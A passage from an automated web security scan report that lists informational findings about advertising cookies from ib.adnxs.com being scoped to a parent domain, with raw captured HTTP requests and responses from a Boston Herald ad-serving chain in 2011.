KoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:02:19 GMT
Content-Length: 743

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.89. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
acb825542=5_[r^208WMM2x@N!@@-#r?TIj?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP0905Saroqh9BWHfHSmrEEKxcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAIAkBAgUCAAUAAAAAhyLogAAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265393%29%3Buf%28%27r%27%2C+116344%2C+1296265393%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.90. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
acb431330=5_[r^208WMM2x@N!@@-#bTu87?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPz4kVcqezP9VBWHfHSmrEEJ_cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQExAUBAgUCAAIAAAAAXCPIbAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265344%29%3Buf%28%27r%27%2C+116344%2C+1296265344%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb431330=5_[r^208WMM2x@N!@@-#bTu87?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPz4kVcqezP9VBWHfHSmrEEJ_cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQExAUBAgUCAAIAAAAAXCPIbAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265344%29%3Buf%28%27r%27%2C+116344%2C+1296265344%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:24 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.91. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+2431